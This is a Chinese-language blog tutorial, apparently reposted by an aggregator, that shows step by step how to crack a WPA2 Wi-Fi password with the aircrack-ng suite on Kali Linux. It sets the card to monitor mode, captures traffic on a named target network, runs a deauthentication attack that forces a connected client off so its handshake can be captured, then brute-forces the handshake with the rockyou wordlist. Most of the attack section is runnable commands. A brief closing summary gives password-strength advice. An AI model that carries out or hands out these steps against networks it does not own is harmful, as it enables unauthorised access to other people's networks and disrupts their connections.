无线安全专题01--kali破解WPA
最近一直用flask寫自己的博客框架,等過段時間才能將其分享出來,所以在此期間決定開個無線安全的專題,分享一些無線安全方面的知識。
好了,廢話不多說,咱們進入今天的主題,使用kali linux上的無線安全工具對wpa加密的wifi進行密碼破解。由于現在wep加密太少了,所以直接略過,選擇破解wpa。WPA破解是通過截獲客戶端和路由器之間的握手包,根據字典的大小進行暴力破解,也就是說字典的大小直接決定了破解的成功與否。(我的新書《Python爬蟲開發與項目實戰》出版了,大家可以看一下樣章)
操作系統:kali linux , 硬件:無線網卡 WN722N
(1)打開終端:1.輸入ifconfig,查看無線網卡是否加載了
2.輸入:airmon-ng start wlan3,將網絡啟動為監聽模式
3.輸入:airodump-ng wlan3mon 監聽網絡數據包 ,如果出現以下錯誤,繼續執行圖中代碼。
繼續輸入:airodump-ng wlan3mon,會出現監聽界面。
從監聽界面中我們可以看到這個wifi的mac地址8C:AB:8E:A9:CB:60,加密方式:WPA2,所在的信道1.
這個wifi現在有一個客戶端正在進行連接。接下來開始抓包,抓取握手包。
4.輸入 airodump-ng -c 1 --bssid8C:AB:8E:A9:CB:60 -w phi wlan3mon
-c:指定信道 --bssid:指定wifi mac -w:指定抓取的數據包存儲的文件
5:這時候我們需要再開啟一個終端進行取消驗證攻擊,迫使這個已經連上的客戶端斷開。
這樣當客戶端自動連接的時候,就可以抓取這個握手包了。
在新的終端中執行: aireplay-ng -0 3 -a 8C:AB:8E:A9:CB:60 -c 70:1A:04:B7:1A:90 wlan3mon
-0:指定為取消驗證攻擊 3:攻擊次數 -a:指定ap的mac -c:指定客戶端的mac
6:執行完之后,過一會就會看到監聽到了握手包。
7:既然抓到了握手包,Ctrl+C停止抓包。使用aircrack-ng進行暴力破解。
在終端中輸入:aircrack-ng -w /usr/share/wordlists/rockyou.txt phi-01.cap
-w:指定破解用的密碼字典 phi-01.cap:這個是之前抓取握手包的數據包
大約過了5分鐘,爆破成功.出現了KEY FOUND后面的中括號中就是密碼。
(2)總結:
1.由于WPA破解是采用暴力破解的方式(路由器沒有開啟wps),字典越大,破解的可能性越大。所以大家盡量設置復雜的密碼,多位數+字母。
2.很多人采取隱藏SSID,不暴露wifi名稱的方式來防止被破解,事實并沒有什么用,因為整個破解過程中并不需要知道你的wifi名稱。
今天的分享就到這里,下一篇繼續分析。如果大家覺得還可以呀,記得推薦呦。
歡迎大家支持我公眾號:
本文章屬于原創作品,歡迎大家轉載分享。尊重原創,轉載請注明來自:七夜的故事http://www.cnblogs.com/qiyeboy/
總結
以上是生活随笔為你收集整理的无线安全专题01--kali破解WPA的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 这几天有django和python做了一
- 下一篇: matlab中gatbx工具箱的添加